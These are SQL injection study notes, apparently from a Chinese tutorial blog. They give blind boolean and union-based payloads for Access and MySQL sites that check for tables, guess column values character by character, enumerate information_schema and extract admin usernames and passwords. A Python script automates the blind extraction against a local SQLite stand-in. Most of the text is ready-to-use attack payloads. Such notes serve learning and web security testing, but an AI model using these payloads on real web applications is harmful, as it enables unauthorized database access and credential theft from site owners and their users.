SQL injection study notes

Check whether a table exists (each payload is appended to the injectable parameter after `and`; the page renders normally when the condition is true)
and (select count(*) from admin)>=0

and exists(select count(*) from admin)

Check whether a column exists
and exists(select username from admin)
and (select count(username) from admin)>=0

Guessing values (blind injection)
Guess the field length: and (select top 1 len(username) from admin)>1 returns normal; raise the number until the page changes

Guess the ASCII code of each character: and (select top 1 asc(mid(username,2,1)) from admin)>99
The code lies in 1-128, so halve the interval on every true/false answer (binary search: about 7 requests per character instead of up to 128)
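A worked example of the length and character guessing above, added to these notes and not part of the original page. It drives a hypothetical vulnerable `?id=` endpoint backed by an in-memory SQLite database with constructed `news` and `admin` tables (a stand-in for the Access back end); SQLite has no top/asc/mid, so the payloads use the equivalents limit 1 / unicode() / substr(), but the true/false oracle and the halving of the 1-128 interval are exactly the technique described.

```python
import sqlite3

# Constructed sample data (not from the notes): SQLite stands in for Access.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE news (id INTEGER, title TEXT);
    INSERT INTO news VALUES (1, 'hello');
    CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
    INSERT INTO admin VALUES (1, 'admin', 's3cret');
""")


def page_returns_normal(id_param: str) -> bool:
    """Hypothetical vulnerable endpoint: ?id=<value> is concatenated into the
    query. True means the page rendered normally (the row came back);
    False means an empty page or an SQL error page."""
    sql = "SELECT title FROM news WHERE id=" + id_param   # no parameterisation
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition: str) -> bool:
    """Append `and (condition)` to a known-good id and watch the page."""
    return page_returns_normal(f"1 and ({condition})")


def guess_length(column: str, table: str, max_len: int = 64) -> int:
    # "len(x)>N" from the notes, but bisected on N instead of probing linearly
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"(select length({column}) from {table} limit 1)>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def guess_char(column: str, table: str, pos: int) -> str:
    # asc(mid(col,pos,1))>X from the notes; SQLite spelling is unicode(substr()).
    # Each answer halves the 1..128 interval, so ~7 requests per character.
    lo, hi = 1, 128
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"(select unicode(substr({column},{pos},1)) "
                  f"from {table} limit 1)>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(column: str, table: str) -> str:
    """Full blind read of one value: length first, then every character."""
    n = guess_length(column, table)
    return "".join(guess_char(column, table, i) for i in range(1, n + 1))


if __name__ == "__main__":
    print("admin table exists:", oracle("(select count(*) from admin)>=0"))
    print("nosuch table exists:", oracle("(select count(*) from nosuch)>=0"))
    print(extract("username", "admin"), extract("password", "admin"))
```

The `(select count(*) from admin)>=0` probe from the notes maps directly onto `oracle()`: a missing table turns the query into an error, so the page stops rendering and the probe answers false.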

mid() extracts characters from a text value

mid(column name, start position, number of characters) (the count is optional)
mid(username, 1, 1) is the first character of the username column

top N returns the first N rows
top 1 returns the first row
top 2 returns the first two rows

first() returns the value of the first record of a column (Access only)
SELECT FIRST(OrderPrice) AS FirstOrderPrice FROM admin

count() returns the number of rows
select count(*) from admin
returns the number of rows in the admin table

as names the result column
select count(*) as qqq from admin where id=1
The output is
qqq
2
meaning there are two rows with id=1


Using order by errors and union to display data
1. First guess the number of columns: asp?id=1 order by N, increasing N until the page errors; the last N that works is the column count.
2. Then find which columns are displayed: asp?id=1 and 1=2 union select 1,2,3,... from table. In Access (ASP) the from clause is mandatory, so a valid table name must be guessed first; in MySQL (PHP) it can be omitted.
3. Force the original query to return nothing so the union row is shown: asp?id=1 and 1=222 union select 1,2,3,... from table
4. Display data: replace the number that appeared on the page with the column to read: union select 1,password,3 from table

Injection differs by database

Database levels
Access database (one .mdb file):
  database
    table name
      column name
        content
MySQL 5.0 database (one server holds many databases):
  database server
    aaaa
      table name
        column name
          content
    bbbb
      table name
        column name
          content

Access database: "brute-force the database" (暴库) injection;
on the login page, inspect the elements: the name attribute of a form element may reveal
the database path, and the database file can then be downloaded if it has the
suffix mdb, asa or asp
a database file renamed to the .asp suffix is still executed as a script by the server

MySQL injection
MySQL data files have the suffixes myd, myi, frm
MySQL is separate from the website directory and is reached over a network connection, so its files cannot be downloaded like an .mdb
MySQL injection must first guess the database name, then the tables and columns
MySQL 5.0 and above has information_schema by default, which stores the names of the tables and columns of all databases
information_schema.tables lists the tables
information_schema.columns lists the columns
table_schema is the database name
table_name is the table name
column_name is the column name
group_concat(table_name) concatenates all table names into one value
MySQL built-in information
database version: version()
current database name: database()
database user: user()
OS: @@version_compile_os
List all tables: php?id=1 and 1=2 union select 1,group_concat(table_name),3,4,... from information_schema.tables where table_schema=<database name>. The database name is given as a hex literal (0x...) so that no quotes are needed.
Pick a table and list all of its columns:
... union select 1,group_concat(column_name),3,4,... from information_schema.columns where table_name=<table name>. The table name is hex-encoded in the same way.
Then read the content directly:
... union select 1,<column>,3,4,... from <table>

Summary:
guess the database name
database()
guess the tables
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=<database name (hex)> limit 0,1   (limit start,count: 0 is the first record, 1 means show one record)
and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x61646D696E   (0x61646D696E is "admin" in hex)
guess the columns
and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=<table name (hex)> limit 0,1
guess the password
and 1=2 union select 1,2,3,<username column>,5,6,7,<password column>,9,10 from <table name> limit 0,1


Origin http://43.154.161.224:23101/article/api/json?id=324758238&siteId=291194637